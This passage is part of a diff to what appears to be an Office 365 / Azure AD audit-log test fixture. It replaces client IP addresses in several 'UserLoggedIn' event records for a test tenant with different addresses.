Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"ec9fa29b-6201-456d-b228-ca1759e0bf6c\",\"InterSystemsId\":\"82b07417-7b33-4531-952f-d3f719e2356a\",\"IntraSystemId\":\"280b3410-9d51-4ce3-952d-5bba0bea6600\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -3010,10 +3010,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "00000002-0000-0ff1-ce00-000000000000", "AzureActiveDirectoryEventType": 1, - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-07T16:43:22", "ExtendedProperties": [ { 
@@ -3063,7 +3063,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-06T09:28:04\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"e988fd90-2eff-4ad7-9f02-030a9d73ad6e\",\"InterSystemsId\":\"8571fe85-eb4a-430d-b468-97900e344923\",\"IntraSystemId\":\"d239e473-6687-4ff9-ac65-0e3c59961600\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-06T09:28:04\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"e988fd90-2eff-4ad7-9f02-030a9d73ad6e\",\"InterSystemsId\":\"8571fe85-eb4a-430d-b468-97900e344923\",\"IntraSystemId\":\"d239e473-6687-4ff9-ac65-0e3c59961600\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -3073,10 +3073,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-06T09:28:04", "ExtendedProperties": [ { 
@@ -3119,7 +3119,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:38:35\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3cbf15a5-84d0-4b0e-ba8e-c3ed43477293\",\"InterSystemsId\":\"8d662bc0-0011-424d-a7dc-56bfc5a142b4\",\"IntraSystemId\":\"d0a4e1ed-206d-4602-aaae-406a02c5c300\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:35\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3cbf15a5-84d0-4b0e-ba8e-c3ed43477293\",\"InterSystemsId\":\"8d662bc0-0011-424d-a7dc-56bfc5a142b4\",\"IntraSystemId\":\"d0a4e1ed-206d-4602-aaae-406a02c5c300\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -3137,10 +3137,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ApplicationId": "00000002-0000-0ff1-ce00-000000000000", "AzureActiveDirectoryEventType": 1, - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CreationTime": "2020-02-12T21:38:35", "ExtendedProperties": [ { 
@@ -3190,7 +3190,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:36\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"d2bb7eae-bc6e-42d2-b270-a885ec626235\",\"InterSystemsId\":\"9270f20a-56f2-493e-b6a7-a859adcaf626\",\"IntraSystemId\":\"97aa710f-536f-44c8-a8d5-711dc55f5500\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:36\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"d2bb7eae-bc6e-42d2-b270-a885ec626235\",\"InterSystemsId\":\"9270f20a-56f2-493e-b6a7-a859adcaf626\",\"IntraSystemId\":\"97aa710f-536f-44c8-a8d5-711dc55f5500\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -3208,10 +3208,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "00000002-0000-0ff1-ce00-000000000000", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:13:36", "ExtendedProperties": [ { 
@@ -3261,7 +3261,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T10:51:49\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"03de6d95-b955-451c-8311-473b6853d774\",\"InterSystemsId\":\"97c52753-c410-438f-89e2-22741e5ccc6a\",\"IntraSystemId\":\"c9ef5d5f-e3af-4669-b465-921d8b58bd00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:51:49\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"03de6d95-b955-451c-8311-473b6853d774\",\"InterSystemsId\":\"97c52753-c410-438f-89e2-22741e5ccc6a\",\"IntraSystemId\":\"c9ef5d5f-e3af-4669-b465-921d8b58bd00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -3279,10 +3279,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "79.159.10.151", + "ActorIpAddress": "67.43.156.13", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "79.159.10.151", + "ClientIP": "67.43.156.13", "CreationTime": "2020-02-12T10:51:49", "ExtendedProperties": [ { 
@@ -3332,7 +3332,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"213.97.47.133\",\"ApplicationId\":\"e48d4214-364e-4731-b2b6-47dabf529218\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"213.97.47.133\",\"CreationTime\":\"2020-02-07T16:43:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"ac8fcffb-7c44-498d-ad6b-24b85a3a1b59\",\"InterSystemsId\":\"9e0a494b-0db0-4481-a70e-eea6124b7018\",\"IntraSystemId\":\"e7a84bcf-41ff-4953-8e99-fb1820685f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000004-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000004-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"e48d4214-364e-4731-b2b6-47dabf529218\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"ac8fcffb-7c44-498d-ad6b-24b85a3a1b59\",\"InterSystemsId\":\"9e0a494b-0db0-4481-a70e-eea6124b7018\",\"IntraSystemId\":\"e7a84bcf-41ff-4953-8e99-fb1820685f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000004-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000004-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -3350,10 +3350,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "213.97.47.133", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "e48d4214-364e-4731-b2b6-47dabf529218", "AzureActiveDirectoryEventType": 1, - "ClientIP": "213.97.47.133", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-07T16:43:37", "ExtendedProperties": [ { 
@@ -3403,7 +3403,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:13:36\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"880fb7bc-5708-42d1-86a8-760c32ac5e6b\",\"InterSystemsId\":\"9fc4af4c-bf19-4f88-92ac-0fd029ca21bd\",\"IntraSystemId\":\"56fa424b-64bd-4ea5-abc4-38256f8a5600\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:36\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"880fb7bc-5708-42d1-86a8-760c32ac5e6b\",\"InterSystemsId\":\"9fc4af4c-bf19-4f88-92ac-0fd029ca21bd\",\"IntraSystemId\":\"56fa424b-64bd-4ea5-abc4-38256f8a5600\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -3421,10 +3421,10 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ApplicationId": "89bee1f7-5e6e-4d8a-9f3d-ecd601259da7", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:13:36", "ExtendedProperties": [ { 
@@ -3474,7 +3474,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"79.159.10.151\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"79.159.10.151\",\"CreationTime\":\"2020-02-12T21:38:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"30c7afcc-f74d-4b5a-898e-ce72da9386b8\",\"InterSystemsId\":\"a35e980b-88be-4343-9691-629473e01983\",\"IntraSystemId\":\"78a2aa65-5026-4124-970a-00e06dc7df00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
